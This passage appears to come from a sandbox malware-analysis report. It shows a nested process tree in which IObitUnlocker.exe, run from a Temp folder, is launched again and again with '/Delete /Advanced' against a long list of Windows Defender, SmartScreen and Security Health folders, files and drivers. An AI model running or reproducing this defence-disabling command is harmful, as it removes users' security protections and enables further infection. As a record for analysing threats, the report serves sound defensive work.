                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            PID:8396
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe /Delete /Advanced "C:\ProgramData\Microsoft\Windows Defender","C:\ProgramData\Microsoft\Windows Defender Advanced Threat Protection","C:\ProgramData\Microsoft\Windows Security Health","C:\ProgramData\Microsoft\Storage Health","C:\Program Files\Windows Defender","C:\Program Files\Windows Defender Sleep","C:\Program Files\Windows Defender Advanced Threat Protection","C:\Program Files\Windows Security","C:\Program Files\PCHealthCheck","C:\Program Files\Microsoft Update Health Tools","C:\Program Files (x86)\Windows Defender","C:\Program Files (x86)\Windows Defender Advanced Threat Protection","C:\Windows\system32\security\database","C:\Windows\system32\HealthAttestationClient","C:\Windows\system32\SecurityHealth","C:\Windows\system32\WebThreatDefSvc","C:\Windows\system32\Sgrm","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\system32\Tasks_Migrated\Microsoft\Windows\Windows Defender","C:\Windows\system32\drivers\wd","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\Containers\WindowsDefenderApplicationGuard.wim","C:\Windows\Containers\serviced\WindowsDefenderApplicationGuard.wim","C:\Windows\system32\SecurityHealthService.exe","C:\Windows\system32\SecurityHealthService.exe_fuck","C:\Windows\system32\SecurityHealthSystray.exe","C:\Windows\system32\SecurityHealthHost.exe","C:\Windows\system32\SecurityHealthAgent.dll","C:\Windows\system32\SecurityHealthSSO.dll","C:\Windows\system32\SecurityHealthProxyStub.dll","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderApiLogger.etl","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderAuditLogger.etl","C:\Windows\system32\smartscreen.dll","C:\Windows\system32\wscisvif.dll","C:\Windows\system32\wscproxystub.dll","C:\Windows\system32\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\wscsvc.dll","C:\Windows\system32\SecurityHealthCore.dll","C:\Windows\system32\SecurityHealthSsoUdk.dll","C:\Windows\system32\SecurityHealthUdk.dll","C:\Windows\system32\smartscreen.exe","C:\Windows\system32\smartscreen.exedel","C:\Windows\SysWOW64\smartscreen.dll","C:\Windows\SysWOW64\wscisvif.dll","C:\Windows\SysWOW64\wscproxystub.dll","C:\Windows\SysWOW64\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\Tasks\Microsoft\Windows\Windows Defender"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            10⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              PID:8236
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            • C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe /Delete /Advanced "C:\ProgramData\Microsoft\Windows Defender","C:\ProgramData\Microsoft\Windows Defender Advanced Threat Protection","C:\ProgramData\Microsoft\Windows Security Health","C:\ProgramData\Microsoft\Storage Health","C:\Program Files\Windows Defender","C:\Program Files\Windows Defender Sleep","C:\Program Files\Windows Defender Advanced Threat Protection","C:\Program Files\Windows Security","C:\Program Files\PCHealthCheck","C:\Program Files\Microsoft Update Health Tools","C:\Program Files (x86)\Windows Defender","C:\Program Files (x86)\Windows Defender Advanced Threat Protection","C:\Windows\system32\security\database","C:\Windows\system32\HealthAttestationClient","C:\Windows\system32\SecurityHealth","C:\Windows\system32\WebThreatDefSvc","C:\Windows\system32\Sgrm","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\system32\Tasks_Migrated\Microsoft\Windows\Windows Defender","C:\Windows\system32\drivers\wd","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\Containers\WindowsDefenderApplicationGuard.wim","C:\Windows\Containers\serviced\WindowsDefenderApplicationGuard.wim","C:\Windows\system32\SecurityHealthService.exe","C:\Windows\system32\SecurityHealthService.exe_fuck","C:\Windows\system32\SecurityHealthSystray.exe","C:\Windows\system32\SecurityHealthHost.exe","C:\Windows\system32\SecurityHealthAgent.dll","C:\Windows\system32\SecurityHealthSSO.dll","C:\Windows\system32\SecurityHealthProxyStub.dll","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderApiLogger.etl","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderAuditLogger.etl","C:\Windows\system32\smartscreen.dll","C:\Windows\system32\wscisvif.dll","C:\Windows\system32\wscproxystub.dll","C:\Windows\system32\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\wscsvc.dll","C:\Windows\system32\SecurityHealthCore.dll","C:\Windows\system32\SecurityHealthSsoUdk.dll","C:\Windows\system32\SecurityHealthUdk.dll","C:\Windows\system32\smartscreen.exe","C:\Windows\system32\smartscreen.exedel","C:\Windows\SysWOW64\smartscreen.dll","C:\Windows\SysWOW64\wscisvif.dll","C:\Windows\SysWOW64\wscproxystub.dll","C:\Windows\SysWOW64\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\Tasks\Microsoft\Windows\Windows Defender"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              10⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                PID:8648
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              • C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe /Delete /Advanced "C:\ProgramData\Microsoft\Windows Defender","C:\ProgramData\Microsoft\Windows Defender Advanced Threat Protection","C:\ProgramData\Microsoft\Windows Security Health","C:\ProgramData\Microsoft\Storage Health","C:\Program Files\Windows Defender","C:\Program Files\Windows Defender Sleep","C:\Program Files\Windows Defender Advanced Threat Protection","C:\Program Files\Windows Security","C:\Program Files\PCHealthCheck","C:\Program Files\Microsoft Update Health Tools","C:\Program Files (x86)\Windows Defender","C:\Program Files (x86)\Windows Defender Advanced Threat Protection","C:\Windows\system32\security\database","C:\Windows\system32\HealthAttestationClient","C:\Windows\system32\SecurityHealth","C:\Windows\system32\WebThreatDefSvc","C:\Windows\system32\Sgrm","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\system32\Tasks_Migrated\Microsoft\Windows\Windows Defender","C:\Windows\system32\drivers\wd","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\Containers\WindowsDefenderApplicationGuard.wim","C:\Windows\Containers\serviced\WindowsDefenderApplicationGuard.wim","C:\Windows\system32\SecurityHealthService.exe","C:\Windows\system32\SecurityHealthService.exe_fuck","C:\Windows\system32\SecurityHealthSystray.exe","C:\Windows\system32\SecurityHealthHost.exe","C:\Windows\system32\SecurityHealthAgent.dll","C:\Windows\system32\SecurityHealthSSO.dll","C:\Windows\system32\SecurityHealthProxyStub.dll","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderApiLogger.etl","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderAuditLogger.etl","C:\Windows\system32\smartscreen.dll","C:\Windows\system32\wscisvif.dll","C:\Windows\system32\wscproxystub.dll","C:\Windows\system32\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\wscsvc.dll","C:\Windows\system32\SecurityHealthCore.dll","C:\Windows\system32\SecurityHealthSsoUdk.dll","C:\Windows\system32\SecurityHealthUdk.dll","C:\Windows\system32\smartscreen.exe","C:\Windows\system32\smartscreen.exedel","C:\Windows\SysWOW64\smartscreen.dll","C:\Windows\SysWOW64\wscisvif.dll","C:\Windows\SysWOW64\wscproxystub.dll","C:\Windows\SysWOW64\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\Tasks\Microsoft\Windows\Windows Defender"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                10⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  PID:8768
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                • C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe /Delete /Advanced "C:\ProgramData\Microsoft\Windows Defender","C:\ProgramData\Microsoft\Windows Defender Advanced Threat Protection","C:\ProgramData\Microsoft\Windows Security Health","C:\ProgramData\Microsoft\Storage Health","C:\Program Files\Windows Defender","C:\Program Files\Windows Defender Sleep","C:\Program Files\Windows Defender Advanced Threat Protection","C:\Program Files\Windows Security","C:\Program Files\PCHealthCheck","C:\Program Files\Microsoft Update Health Tools","C:\Program Files (x86)\Windows Defender","C:\Program Files (x86)\Windows Defender Advanced Threat Protection","C:\Windows\system32\security\database","C:\Windows\system32\HealthAttestationClient","C:\Windows\system32\SecurityHealth","C:\Windows\system32\WebThreatDefSvc","C:\Windows\system32\Sgrm","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\system32\Tasks_Migrated\Microsoft\Windows\Windows Defender","C:\Windows\system32\drivers\wd","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\Containers\WindowsDefenderApplicationGuard.wim","C:\Windows\Containers\serviced\WindowsDefenderApplicationGuard.wim","C:\Windows\system32\SecurityHealthService.exe","C:\Windows\system32\SecurityHealthService.exe_fuck","C:\Windows\system32\SecurityHealthSystray.exe","C:\Windows\system32\SecurityHealthHost.exe","C:\Windows\system32\SecurityHealthAgent.dll","C:\Windows\system32\SecurityHealthSSO.dll","C:\Windows\system32\SecurityHealthProxyStub.dll","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderApiLogger.etl","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderAuditLogger.etl","C:\Windows\system32\smartscreen.dll","C:\Windows\system32\wscisvif.dll","C:\Windows\system32\wscproxystub.dll","C:\Windows\system32\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\wscsvc.dll","C:\Windows\system32\SecurityHealthCore.dll","C:\Windows\system32\SecurityHealthSsoUdk.dll","C:\Windows\system32\SecurityHealthUdk.dll","C:\Windows\system32\smartscreen.exe","C:\Windows\system32\smartscreen.exedel","C:\Windows\SysWOW64\smartscreen.dll","C:\Windows\SysWOW64\wscisvif.dll","C:\Windows\SysWOW64\wscproxystub.dll","C:\Windows\SysWOW64\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\Tasks\Microsoft\Windows\Windows Defender"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  10⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    PID:6180
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe /Delete /Advanced "C:\ProgramData\Microsoft\Windows Defender","C:\ProgramData\Microsoft\Windows Defender Advanced Threat Protection","C:\ProgramData\Microsoft\Windows Security Health","C:\ProgramData\Microsoft\Storage Health","C:\Program Files\Windows Defender","C:\Program Files\Windows Defender Sleep","C:\Program Files\Windows Defender Advanced Threat Protection","C:\Program Files\Windows Security","C:\Program Files\PCHealthCheck","C:\Program Files\Microsoft Update Health Tools","C:\Program Files (x86)\Windows Defender","C:\Program Files (x86)\Windows Defender Advanced Threat Protection","C:\Windows\system32\security\database","C:\Windows\system32\HealthAttestationClient","C:\Windows\system32\SecurityHealth","C:\Windows\system32\WebThreatDefSvc","C:\Windows\system32\Sgrm","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\system32\Tasks_Migrated\Microsoft\Windows\Windows Defender","C:\Windows\system32\drivers\wd","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\Containers\WindowsDefenderApplicationGuard.wim","C:\Windows\Containers\serviced\WindowsDefenderApplicationGuard.wim","C:\Windows\system32\SecurityHealthService.exe","C:\Windows\system32\SecurityHealthService.exe_fuck","C:\Windows\system32\SecurityHealthSystray.exe","C:\Windows\system32\SecurityHealthHost.exe","C:\Windows\system32\SecurityHealthAgent.dll","C:\Windows\system32\SecurityHealthSSO.dll","C:\Windows\system32\SecurityHealthProxyStub.dll","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderApiLogger.etl","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderAuditLogger.etl","C:\Windows\system32\smartscreen.dll","C:\Windows\system32\wscisvif.dll","C:\Windows\system32\wscproxystub.dll","C:\Windows\system32\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\wscsvc.dll","C:\Windows\system32\SecurityHealthCore.dll","C:\Windows\system32\SecurityHealthSsoUdk.dll","C:\Windows\system32\SecurityHealthUdk.dll","C:\Windows\system32\smartscreen.exe","C:\Windows\system32\smartscreen.exedel","C:\Windows\SysWOW64\smartscreen.dll","C:\Windows\SysWOW64\wscisvif.dll","C:\Windows\SysWOW64\wscproxystub.dll","C:\Windows\SysWOW64\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\Tasks\Microsoft\Windows\Windows Defender"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    10⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      PID:8752
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe /Delete /Advanced "C:\ProgramData\Microsoft\Windows Defender","C:\ProgramData\Microsoft\Windows Defender Advanced Threat Protection","C:\ProgramData\Microsoft\Windows Security Health","C:\ProgramData\Microsoft\Storage Health","C:\Program Files\Windows Defender","C:\Program Files\Windows Defender Sleep","C:\Program Files\Windows Defender Advanced Threat Protection","C:\Program Files\Windows Security","C:\Program Files\PCHealthCheck","C:\Program Files\Microsoft Update Health Tools","C:\Program Files (x86)\Windows Defender","C:\Program Files (x86)\Windows Defender Advanced Threat Protection","C:\Windows\system32\security\database","C:\Windows\system32\HealthAttestationClient","C:\Windows\system32\SecurityHealth","C:\Windows\system32\WebThreatDefSvc","C:\Windows\system32\Sgrm","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\system32\Tasks_Migrated\Microsoft\Windows\Windows Defender","C:\Windows\system32\drivers\wd","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\Containers\WindowsDefenderApplicationGuard.wim","C:\Windows\Containers\serviced\WindowsDefenderApplicationGuard.wim","C:\Windows\system32\SecurityHealthService.exe","C:\Windows\system32\SecurityHealthService.exe_fuck","C:\Windows\system32\SecurityHealthSystray.exe","C:\Windows\system32\SecurityHealthHost.exe","C:\Windows\system32\SecurityHealthAgent.dll","C:\Windows\system32\SecurityHealthSSO.dll","C:\Windows\system32\SecurityHealthProxyStub.dll","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderApiLogger.etl","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderAuditLogger.etl","C:\Windows\system32\smartscreen.dll","C:\Windows\system32\wscisvif.dll","C:\Windows\system32\wscproxystub.dll","C:\Windows\system32\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\wscsvc.dll","C:\Windows\system32\SecurityHealthCore.dll","C:\Windows\system32\SecurityHealthSsoUdk.dll","C:\Windows\system32\SecurityHealthUdk.dll","C:\Windows\system32\smartscreen.exe","C:\Windows\system32\smartscreen.exedel","C:\Windows\SysWOW64\smartscreen.dll","C:\Windows\SysWOW64\wscisvif.dll","C:\Windows\SysWOW64\wscproxystub.dll","C:\Windows\SysWOW64\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\Tasks\Microsoft\Windows\Windows Defender"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      10⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        PID:8696
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe /Delete /Advanced "C:\ProgramData\Microsoft\Windows Defender","C:\ProgramData\Microsoft\Windows Defender Advanced Threat Protection","C:\ProgramData\Microsoft\Windows Security Health","C:\ProgramData\Microsoft\Storage Health","C:\Program Files\Windows Defender","C:\Program Files\Windows Defender Sleep","C:\Program Files\Windows Defender Advanced Threat Protection","C:\Program Files\Windows Security","C:\Program Files\PCHealthCheck","C:\Program Files\Microsoft Update Health Tools","C:\Program Files (x86)\Windows Defender","C:\Program Files (x86)\Windows Defender Advanced Threat Protection","C:\Windows\system32\security\database","C:\Windows\system32\HealthAttestationClient","C:\Windows\system32\SecurityHealth","C:\Windows\system32\WebThreatDefSvc","C:\Windows\system32\Sgrm","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\system32\Tasks_Migrated\Microsoft\Windows\Windows Defender","C:\Windows\system32\drivers\wd","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\Containers\WindowsDefenderApplicationGuard.wim","C:\Windows\Containers\serviced\WindowsDefenderApplicationGuard.wim","C:\Windows\system32\SecurityHealthService.exe","C:\Windows\system32\SecurityHealthService.exe_fuck","C:\Windows\system32\SecurityHealthSystray.exe","C:\Windows\system32\SecurityHealthHost.exe","C:\Windows\system32\SecurityHealthAgent.dll","C:\Windows\system32\SecurityHealthSSO.dll","C:\Windows\system32\SecurityHealthProxyStub.dll","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderApiLogger.etl","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderAuditLogger.etl","C:\Windows\system32\smartscreen.dll","C:\Windows\system32\wscisvif.dll","C:\Windows\system32\wscproxystub.dll","C:\Windows\system32\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\wscsvc.dll","C:\Windows\system32\SecurityHealthCore.dll","C:\Windows\system32\SecurityHealthSsoUdk.dll","C:\Windows\system32\SecurityHealthUdk.dll","C:\Windows\system32\smartscreen.exe","C:\Windows\system32\smartscreen.exedel","C:\Windows\SysWOW64\smartscreen.dll","C:\Windows\SysWOW64\wscisvif.dll","C:\Windows\SysWOW64\wscproxystub.dll","C:\Windows\SysWOW64\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\Tasks\Microsoft\Windows\Windows Defender"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        10⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          PID:8868
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe /Delete /Advanced "C:\ProgramData\Microsoft\Windows Defender","C:\ProgramData\Microsoft\Windows Defender Advanced Threat Protection","C:\ProgramData\Microsoft\Windows Security Health","C:\ProgramData\Microsoft\Storage Health","C:\Program Files\Windows Defender","C:\Program Files\Windows Defender Sleep","C:\Program Files\Windows Defender Advanced Threat Protection","C:\Program Files\Windows Security","C:\Program Files\PCHealthCheck","C:\Program Files\Microsoft Update Health Tools","C:\Program Files (x86)\Windows Defender","C:\Program Files (x86)\Windows Defender Advanced Threat Protection","C:\Windows\system32\security\database","C:\Windows\system32\HealthAttestationClient","C:\Windows\system32\SecurityHealth","C:\Windows\system32\WebThreatDefSvc","C:\Windows\system32\Sgrm","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\system32\Tasks_Migrated\Microsoft\Windows\Windows Defender","C:\Windows\system32\drivers\wd","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\Containers\WindowsDefenderApplicationGuard.wim","C:\Windows\Containers\serviced\WindowsDefenderApplicationGuard.wim","C:\Windows\system32\SecurityHealthService.exe","C:\Windows\system32\SecurityHealthService.exe_fuck","C:\Windows\system32\SecurityHealthSystray.exe","C:\Windows\system32\SecurityHealthHost.exe","C:\Windows\system32\SecurityHealthAgent.dll","C:\Windows\system32\SecurityHealthSSO.dll","C:\Windows\system32\SecurityHealthProxyStub.dll","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderApiLogger.etl","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderAuditLogger.etl","C:\Windows\system32\smartscreen.dll","C:\Windows\system32\wscisvif.dll","C:\Windows\system32\wscproxystub.dll","C:\Windows\system32\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\wscsvc.dll","C:\Windows\system32\SecurityHealthCore.dll","C:\Windows\system32\SecurityHealthSsoUdk.dll","C:\Windows\system32\SecurityHealthUdk.dll","C:\Windows\system32\smartscreen.exe","C:\Windows\system32\smartscreen.exedel","C:\Windows\SysWOW64\smartscreen.dll","C:\Windows\SysWOW64\wscisvif.dll","C:\Windows\SysWOW64\wscproxystub.dll","C:\Windows\SysWOW64\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\Tasks\Microsoft\Windows\Windows Defender"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          10⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            PID:1480
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe /Delete /Advanced "C:\ProgramData\Microsoft\Windows Defender","C:\ProgramData\Microsoft\Windows Defender Advanced Threat Protection","C:\ProgramData\Microsoft\Windows Security Health","C:\ProgramData\Microsoft\Storage Health","C:\Program Files\Windows Defender","C:\Program Files\Windows Defender Sleep","C:\Program Files\Windows Defender Advanced Threat Protection","C:\Program Files\Windows Security","C:\Program Files\PCHealthCheck","C:\Program Files\Microsoft Update Health Tools","C:\Program Files (x86)\Windows Defender","C:\Program Files (x86)\Windows Defender Advanced Threat Protection","C:\Windows\system32\security\database","C:\Windows\system32\HealthAttestationClient","C:\Windows\system32\SecurityHealth","C:\Windows\system32\WebThreatDefSvc","C:\Windows\system32\Sgrm","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\system32\Tasks_Migrated\Microsoft\Windows\Windows Defender","C:\Windows\system32\drivers\wd","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\Containers\WindowsDefenderApplicationGuard.wim","C:\Windows\Containers\serviced\WindowsDefenderApplicationGuard.wim","C:\Windows\system32\SecurityHealthService.exe","C:\Windows\system32\SecurityHealthService.exe_fuck","C:\Windows\system32\SecurityHealthSystray.exe","C:\Windows\system32\SecurityHealthHost.exe","C:\Windows\system32\SecurityHealthAgent.dll","C:\Windows\system32\SecurityHealthSSO.dll","C:\Windows\system32\SecurityHealthProxyStub.dll","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderApiLogger.etl","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderAuditLogger.etl","C:\Windows\system32\smartscreen.dll","C:\Windows\system32\wscisvif.dll","C:\Windows\system32\wscproxystub.dll","C:\Windows\system32\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\wscsvc.dll","C:\Windows\system32\SecurityHealthCore.dll","C:\Windows\system32\SecurityHealthSsoUdk.dll","C:\Windows\system32\SecurityHealthUdk.dll","C:\Windows\system32\smartscreen.exe","C:\Windows\system32\smartscreen.exedel","C:\Windows\SysWOW64\smartscreen.dll","C:\Windows\SysWOW64\wscisvif.dll","C:\Windows\SysWOW64\wscproxystub.dll","C:\Windows\SysWOW64\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\Tasks\Microsoft\Windows\Windows Defender"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            10⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              PID:8344
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            • C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe /Delete /Advanced "C:\ProgramData\Microsoft\Windows Defender","C:\ProgramData\Microsoft\Windows Defender Advanced Threat Protection","C:\ProgramData\Microsoft\Windows Security Health","C:\ProgramData\Microsoft\Storage Health","C:\Program Files\Windows Defender","C:\Program Files\Windows Defender Sleep","C:\Program Files\Windows Defender Advanced Threat Protection","C:\Program Files\Windows Security","C:\Program Files\PCHealthCheck","C:\Program Files\Microsoft Update Health Tools","C:\Program Files (x86)\Windows Defender","C:\Program Files (x86)\Windows Defender Advanced Threat Protection","C:\Windows\system32\security\database","C:\Windows\system32\HealthAttestationClient","C:\Windows\system32\SecurityHealth","C:\Windows\system32\WebThreatDefSvc","C:\Windows\system32\Sgrm","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\system32\Tasks_Migrated\Microsoft\Windows\Windows 